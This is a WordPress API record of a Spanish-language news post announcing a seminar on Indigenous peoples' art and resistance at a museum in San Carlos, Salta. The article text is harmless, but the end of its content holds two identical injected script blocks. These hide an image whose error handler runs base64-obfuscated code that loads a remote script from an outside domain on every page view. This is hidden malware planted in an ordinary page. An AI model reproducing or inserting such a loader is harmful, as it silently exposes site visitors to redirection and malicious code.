{"id":2520,"date":"2023-04-17T13:38:40","date_gmt":"2023-04-17T16:38:40","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2520"},"modified":"2025-08-14T00:18:56","modified_gmt":"2025-08-14T03:18:56","slug":"seminario-de-pueblos-originarios-arte-y-resistencia","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2520","title":{"rendered":"Seminario de Pueblos Originarios: Arte y Resistencia"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#991a3a\"><em>Los d\u00edas 29, 30 de abril y el primero de mayo en el Museo Jallpa Kalchaki de San Carlos se realizar\u00e1 un seminario a cargo de Laura Pomerantz.<\/em><\/h4>\n\n\n\n<p>Los d\u00edas 29, 30 de abril y el primero de mayo en el Museo Jallpa Kalchaki de San Carlos se realizar\u00e1 el seminario \u201cPueblos originarios: Arte y Resistencia\u201d.<\/p>\n\n\n\n<p>Este seminario nos permite activar el cruce de realidades, invitando a docentes, artistas visuales, artesanas\/os, investigadores\/as y al p\u00fablico interesado a visualizar a los pueblos creadores, as\u00ed como a entender los l\u00edmites que tuvieron que afrontar a lo largo de m\u00e1s de quinientos a\u00f1os.&nbsp;<\/p>\n\n\n\n<p>La idea de potenciar su cultura nos aleja de la cartograf\u00eda naturalizada, permiti\u00e9ndonos alcanzar una mirada menos parcial y m\u00e1s abarcadora, menos ficcional y m\u00e1s terrenal. Manifestamos despojarnos de los velos que la historia oficial sigue construyendo sobre la base de la negaci\u00f3n, frente al urgente grito hist\u00f3ricamente ahogado: transmitir la realidad identitaria que constituye a los pueblos originarios como actores sociales, sum\u00e1ndose a la lucha por el cierre de una herida a\u00fan abierta.<\/p>\n\n\n\n<p>El seminario se encontrar\u00e1 a cargo de la Dra. Laura Pomerantz y se llevar\u00e1 a cabo los d\u00edas s\u00e1bado 29 y domingo 30 de abril y lunes 1 de mayo en el museo Japha Kalchaki, San Carlos, Salta.<\/p>\n\n\n\n<p>Para m\u00e1s informaci\u00f3n, programa completo e inscripciones, pod\u00e9s comunicarte a trav\u00e9s de&nbsp;jallphakalchaki@gmail.com<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/seminario-de-pueblos-originarios-arte-y-resistencia-89077\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Los d\u00edas 29, 30 de abril y el primero de mayo en el Museo Jallpa Kalchaki de San Carlos se realizar\u00e1 un seminario a cargo de Laura Pomerantz. Los d\u00edas 29, 30 de abril y el primero de mayo en el Museo Jallpa Kalchaki de San Carlos se realizar\u00e1 el seminario \u201cPueblos originarios: Arte y [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2521,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[15],"tags":[],"class_list":{"0":"post-2520","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2520"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2520"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2520\/revisions"}],"predecessor-version":[{"id":7113,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2520\/revisions\/7113"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2521"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2520"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2520"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2520"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}